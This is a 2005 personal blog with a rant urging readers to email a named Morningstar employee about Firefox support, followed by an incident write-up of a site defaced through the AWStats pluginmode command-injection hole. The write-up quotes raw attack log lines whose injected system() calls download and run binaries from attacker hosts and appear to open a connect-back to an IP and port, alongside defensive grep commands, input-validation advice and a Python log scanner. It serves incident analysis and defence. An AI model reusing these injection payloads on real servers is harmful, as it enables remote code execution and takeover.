Chovy’s Blog

Why Morningstar (and Joe) Suck….

Fri, February 4, 2005 — Category: Personal

So, I’ve emailed joe@morningstar.com about a javascript bug that I’m experiencing in FireFox on MorningStar’s “Charts & Returns” web page: notice you can’t click on the tabs for each timeframe of the Chart image (this only happens in mozilla-based browsers).

First time I emailed joe@morningstar.com, he didn’t reply (I even sent him a link to the ever-so-simple fix I created and documented to make it work). After finding other bugs with MorningStar’s web site, I emailed joe@morningstar.com again…this time he replied, and said “We only support Internet Explorer”…well that’s just not good enough Joe! We, the savvy, use FireFox…and some of us even use Linux!! (imagine that, not using Microsoft products at all!!).

It’s about time you, Joe@Morningstar.com, get with the program, and start supporting mozilla-based browsers on your web site; after all, it’s two lines of javascript you need to have your engineers fix to get a major feature of the web site (charting) to work. It’s really not that hard. As a web developer myself, I cannot stress enough how you need to support Safari, IE 4+, and mozilla-based browsers.

I’ve been using MorningStar for quite some time, and swear by it. I’ve told my mom, who NEVER uses the Internet (and countless co-workers and friends), about it, and she even loves the site (and of course, yes, I got her using FireFox too) - that’s two of us, Joe@MorningStar.com, who can’t use your web site.

I’m afraid though, that I’m going to have to start recommending Yahoo Finance to my avid readers and friends, as they are a REAL Internet company, who sees the value in supporting alternative browsers to that piece-of-crap you’re so happy to use, Joe@morningstar.com.

By the way, if you’re a fellow FireFox user, or simply “down with the cause…” shoot Joe an email. In case you didn’t catch it, his email is: joe@morningstar.com

Thank you!
Anthony


Simiens Crew 2005 - How They Did It!

Wed, February 2, 2005 — Category: Personal

Updated: Awstats 6.4 fixes even more security holes. Please upgrade to 6.4

One of my sites got hacked on Feb. 1, 2005, they changed the index.html and put “Simiens Crew 2005, Enquanto Houver Fome Morte Guerra Simiens Existira”

I’ve heard people suspect both a PHP vulnerability and Awstats, both of which I’m using.

I’m using PHP Version 4.3.10 and Advanced Web Statistics 6.1 (build 1.751) (awstats)

I just checked the awstats homepage:

“Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user “nobody”). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommended to update to 6.3 version that fixes this security hole.”

http://awstats.sf.net

Here’s some more info, and how I traced it down to awstats…

Here’s an excerpt from my clsearch.org log file:

tt.txt is a binary, which they ran (no idea what it did):

system("cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%20777%20tt.txt;./tt.txt);

and dc.zip is also a binary they downloaded and ran:

system("wget%20gotmoney.100free.com/dc.zip");

An email to my provider: You also have several hacked instances on your server in /tmp, most of which are binaries, two of which are perl scripts. One of the perl scripts attempts to connect to an irc server, the same server that the people who hacked my site have a channel on (#simiens). I couldn’t uncompress dc.zip (which was downloaded, according to my log files, but I suspect dc.pl is what it contained - who knows what else, as it was an executable binary).

Some other nefarious things in /tmp on Neureal’s server:

brk2
cgi
ct
ct.1
dc.pl
index.html (contains a meta-refresh to some japanese online shopping site )
nbot.pl
r0nin

(The source for the two Perl scripts can be found here)

To find exploitable awstats configuration files (the glob is quoted so the shell doesn’t expand it before find sees it, and grepping the files directly prints the file name next to each match):
find . -name 'awstats*.conf' | xargs grep 'AllowToUpdateStatsFromBrowser=1'

Replace all those instances so it’s set to 0 instead, otherwise your customers will be exposed until you upgrade awstats.

Traverse the ./logs directory looking for exploit attempts in the log files (67.169.x.x is my own ip; we’ll weed those out with grep -v):

find . -name "*.gz" | xargs zcat | grep awstats.pl | grep -v 67.169.x.x | less

Here’s the attack as it happened in my log file:

200.158.37.192 - - [29/Jan/2005:13:57:05 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("/bin/ls"); HTTP/1.1" 200 3294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:57:11 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("uname%20-a"); HTTP/1.1" 200 3302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:57:33 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%20777%20tt.txt;./tt.txt"); HTTP/1.1" 200 3207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:07 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;ls"); HTTP/1.1" 200 6902 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:13 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("wget"); HTTP/1.1" 200 3302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:32 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%20777%20tt.txt;./tt.txt); HTTP/1.1" 200 3273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:40 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txtt); HTTP/1.1" 200 3273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:43 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("cd%20/tmp;wget%20protus.com.br/tt.txt); HTTP/1.1" 200 3273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:58:53 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("id"); HTTP/1.1" 200 3272 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:02 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("wget%20protus.com.br/tt.txt"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:10 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("chmod%20777%20tt.txt"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:15 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./tt.txt"); HTTP/1.1" 200 3293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:47 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("wget%20gotmoney.100free.com/dc.zip"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:13:59:52 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("chmod%20777%20dc.zip"); HTTP/1.1" 200 3215 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:00:32 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20200.204.170.225%206262"); HTTP/1.1" 200 3327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:01:10 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20200.204.170.225%206262"); HTTP/1.1" 200 3334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:01:46 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20200.204.170.225%205050"); HTTP/1.1" 200 3334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"
200.158.37.192 - - [29/Jan/2005:14:02:52 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("./dc.zip%20www.asianashop.com%206262"); HTTP/1.1" 200 3334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)"

REMEMBER: Always check user input when you’re coding. Restrict it to only what you deem acceptable input, i.e. if it’s a phone number, use a regexp to weed out everything but digits and dashes, for example in Perl:

if ($phone =~ m/^\d{3}-\d{3}-\d{4}$/) { print "phone ok\n"; }

Obviously, international phone numbers won’t work, but you get the idea. Same goes for ANYTHING you pass to the system() command, which is how they hacked this server.
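Here is an added example (my own code, not part of the original post and not AWStats code) that ties the log-hunting pipeline above to the input-checking advice: a small Python scanner that parses Apache access-log lines, URL-decodes the awstats.pl query, and applies the same allowlist idea as the phone-number regexp to the pluginmode parameter, so the injected system() calls from the log are flagged while a normal report request passes. The plugin-name allowlist, the trimmed user agents and the benign 10.0.0.5 request are my assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache combined-log line; the target is matched greedily so quotes inside the query do not end it early.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Plugin-name allowlist (assumed): letters, digits, underscore. ':', quotes, '(' and ';' are all rejected.
PLUGINMODE_OK = re.compile(r'^[A-Za-z0-9_]*$')

def pluginmode_is_valid(value):
    """Allowlist check, the same idea as the phone-number regexp above."""
    return PLUGINMODE_OK.match(value) is not None

def query_params(query):
    """Split on '&' only (';' is part of the injected command), then URL-decode."""
    params = {}
    for pair in query.split('&'):
        key, _, val = pair.partition('=')
        params[unquote(key)] = unquote(val)
    return params

def scan_line(line):
    """Return (ip, time, decoded pluginmode) for an awstats.pl request whose
    pluginmode fails the allowlist; None for anything else."""
    m = CLF.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    if not url.path.endswith('/awstats.pl'):
        return None
    value = query_params(url.query).get('pluginmode')
    if value is None or pluginmode_is_valid(value):
        return None
    return (m.group('ip'), m.group('time'), value)

def scan_log(text):
    """Apply scan_line to every line of an access log and return the hits."""
    return [h for h in (scan_line(l) for l in text.splitlines()) if h]

# Sample input: two lines from the log above (user agent trimmed) plus one
# constructed benign request, to show normal use passes the allowlist.
SAMPLE_LOG = """\
200.158.37.192 - - [29/Jan/2005:13:57:11 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("uname%20-a"); HTTP/1.1" 200 3302 "-" "Mozilla/4.0"
200.158.37.192 - - [29/Jan/2005:13:58:53 -0500] "GET /cgi-bin/awstats.pl?pluginmode=:system("id"); HTTP/1.1" 200 3272 "-" "Mozilla/4.0"
10.0.0.5 - - [29/Jan/2005:14:05:00 -0500] "GET /cgi-bin/awstats.pl?config=example.org&output=main HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
"""
```

Feed it a real access log with `scan_log(open(path).read())` and each hit gives the source ip, timestamp and the decoded command, which is what the zcat/grep pipeline leaves you to read off by hand.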

This stresses the point of also keeping your software (hopefully it’s open source) up-to-date. Holes in open source software get discovered and patched overnight, sometimes within hours of discovery. Just try to get a corporate conglomerate to “fix” their bug and have it available to you in that amount of time (they’ll even throw in a new licensing fee in order for you to get the fix). :-)

If anyone knows how to disassemble an executable to find out what it does, you can find their code here (beware, I wouldn’t run it on my machine).
